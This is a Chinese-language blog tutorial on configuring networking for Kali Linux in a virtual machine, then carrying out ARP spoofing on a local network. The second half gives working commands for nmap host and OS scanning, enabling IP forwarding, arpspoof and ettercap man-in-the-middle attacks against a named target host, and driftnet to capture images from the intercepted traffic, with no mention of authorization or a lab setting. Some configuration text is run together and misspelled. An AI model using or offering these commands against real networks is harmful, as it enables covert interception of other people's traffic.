對Kali進行網絡配置並進行ARP欺騙

對Kali進行網絡配置並進行ARP欺騙

此文章所使用的配置方法是我經多次嘗試,確定無誤的步驟,但因為每個人的環境不同,所以僅供參考。

Kali的網絡配置

上網方式

1、橋接(寬帶下不可用!!!)

虛擬機與主機在同一個網段中,並且也要為虛擬機分配一個IP地址(不要與主機IP地址相同,也不要與主機所在局域網中的其他計算機IP地址相同),為虛擬機設置子網掩碼、網關地址、DNS地址。除了IP地址不同,其他都相同。

2、NAT

虛擬機使用“NAT”(即VMnet8)虛擬網卡,並且在虛擬機中設置為“自動獲得地址”,虛擬機就可以上網

網絡故障問題的解決方法

1、查看自己ip地址、子網掩碼等信息

ifconfig

如不顯示inet地址,則可能是smbd.server沒開,應輸入

/etc/init.d/smbd start

或輸入

dhclient eth0

命令來獲取IP地址

再輸入ifconfig命令,就能看到eth0已經有IP地址了

配置網絡

vi /etc/network/interfaces

修改為如下形式

#This file describes the network interfaces available on your system # and how to activate them. For more information, see interfaces(5). # The loopback network interface auto loiface lo inet loopback # The primary network interfaceallow-hotplug eth0iface eth0 inet static //配置eth0使用默認的靜態地址# address 192.168.0.133 //設置eth0的IP地址# netmask 255.255.255.0 //配置eth0的子網掩碼# gateway 192.168.0.254 //配置當前主機的默認網關waddress ether 00:50:56:3D:9E:D2 //配置MAC地址

修改文件夾內文本數據時用vi命令,i鍵進入修改模式,修改後按ESC退出修改模式,輸入 :w 保存,輸入 :q 退出文件

配置DNS

Kali Linux的DNS服務器地址使用文件“/etc/resovl.conf”進行配置,用戶可以通過“nameserver”配置項設置DNS服務器的 IP地址;

“resolv.conf”文件中最多可以使用“nameserver”指定3個DNS服務器,按照先後的順序,一旦前面的DNS服務器失效,系統將自動使用後面的DNS服務器。

對於“resolv.conf”文件設置“nameserver”的修改是即時生效的,即只要對“resolv.conf”文件的修改進行了保存,在系統下一次需要進行域名的解析時就會按照該文件中指定的DNS服務器IP地址進行域名的解析。

vi /etc/resovl.conf

修改格式如下

# Generated by NetworkManagernameserver 192.168.229.2 //Nat模式下為虛擬機網卡IP,橋接模式下為主機分配的IPnameserver 114.114.114.114nameserver 8.8.8.8

重啟網卡

/etc/init.d/networking restart ping ping 114.114.114.114 ping 8.8.8.8

ARP欺騙方法

nmap掃描內網主機

nmap -sP 192.168.0.0/24

查看目標主機操作系統信息

nmap -O 192.168.0.133

開啟流量轉發功能

echo 1 >> /proc/sys/net/ipv4/ip_forward

使用arpspoof或ettercap,選一個進行arp欺騙。獲取從192.168.0.1(路由器) 到 192.168.0.21(目標機)的流量。

使用arpspoof(無線網絡下,有線網絡則先ip,後網關):

arpspoof -i eth0 -t 192.168.1.1(網關) 192.168.1.*(ip)arpspoof -i eth0 -t 192.168.0.1 192.168.0.21

使用ettercap:

ettercap -T -q -M ARP /192.168.0.21// ///driftnet圖片流量監控driftnet -i eth0


分享到:


相關文章: